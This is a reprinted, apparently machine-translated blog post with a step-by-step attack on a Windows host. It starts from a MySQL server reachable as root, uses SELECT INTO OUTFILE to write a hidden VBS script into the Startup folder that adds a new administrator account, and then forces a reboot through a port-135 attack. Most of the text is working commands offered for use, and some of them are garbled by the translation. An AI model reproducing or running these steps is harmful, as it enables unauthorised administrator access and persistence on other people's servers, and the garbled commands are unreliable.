Reprint
http://www.sevenline.org/blogview.asp?logid=265
I also found some ways to use this vulnerability, usually write an ASP or PHP back door, not only trouble, but also guess the content of the website, if the other party did not open IIS, then we can't do it? ?
Later, I thought of a way, and I have successful in several machines I have tested. Now I will announce the following:
1, connect to the other party MySQL server
mysql -u root -h 192.168.0.1
MySQL.exe This program is installed in the bin directory of MySQL.
2, let's take a look at what databases in the server
mysql> show data;
MySQL will have mysql, Test, two databases when you are installed, and if you see a database, you can see the database.
3, let us enter the database
Mysql> USE TEST;
We will enter the TEST database
4. What data sheets do we have in the database?
mysql> show tables;
By default, there is no existence of any tables in Test.
The following is a key part
5. Create a new table under the Test database;
Mysql> CREATE TABLE A (CMD text);
Ok, we created a new table, named A, and only one field is stored in the table, the field name is cmd, for text text.
6, insert content in the table
Mysql> Insert INTO A VALUES ("SET WSHSHELL = CREATEOBJECT (" "Wscript.Shell") ")
MySQL> Insert Into a Values ("A = WSHSHELL.Run (" "cmd.exe / c net user zjl317 zjl317 / add" ", 0)");
Mysql> Insert Into a Values ("B = WSHShell.Run (" "cmd.exe / c net localgroup administrators zjl317 / add" ", 0)");
Pay attention to double quotes and brackets and "0" behind you! We will use these three commands to create a VBS scriptor!
7. Ok, now let's take a look at what is in Table A.
Mysql> Select * from A;
We will see three lines of data in the table, which is what we just entered. After confirming the content you entered, we came to the next step.
8. Output table as a script file for a VBS
Mysql> Select * from a INTO OUTFILE "C: / DOCUME ~ 1 / Alluse ~ 1 /" Start "Menu / Program / Start / A.vbs";
We enter the contents of our table to the start group, is a VBS script file! Note "" symbol.
9. See this everyone will definitely know, just use MySQL to output an executable file. Why don't you use bat, because there is a clear DOS window when you start running, and you can completely hide the window with the VBS script and there will be no error tips! Originally, there should be a sentence that automatically deletes this script after completing the script, but the Chinese directory is unable to handle, only the task! Ok, find a tool attack 135 to let the server restart, you will be an administrator after a few minutes.
